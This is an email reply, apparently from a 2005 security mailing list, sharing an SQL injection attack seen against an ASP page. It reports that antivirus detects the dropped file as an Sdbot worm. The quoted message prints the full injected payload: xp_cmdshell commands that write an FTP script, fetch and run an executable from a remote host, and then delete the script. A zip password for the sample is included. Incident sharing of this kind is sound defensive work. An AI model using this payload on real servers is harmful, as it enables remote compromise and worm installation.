my VirusScan (network associates) detected it as
W32/Sdbot.worm.gen
On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
<mducharme () cybergeneration com> wrote:
Hi to the list
today we received the same SQL injection attack
on the same URL :
IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir
%systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka
r0ckpaul >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v
-s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--
The lol.exe file can be found in this archive for
inspection :
zip pass is das978tewa234
Norton with definitions of 12 jan. doesnt find
anything
suspicious.
I'm interested if someone do an analysis on this
file.
Have a nice day
Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau
----- Original Message -----
From: "Maxime Ducharme"
<mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General
DShield Discussion List"
<list () lists dshield org>;
<incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: SQL injection worm ?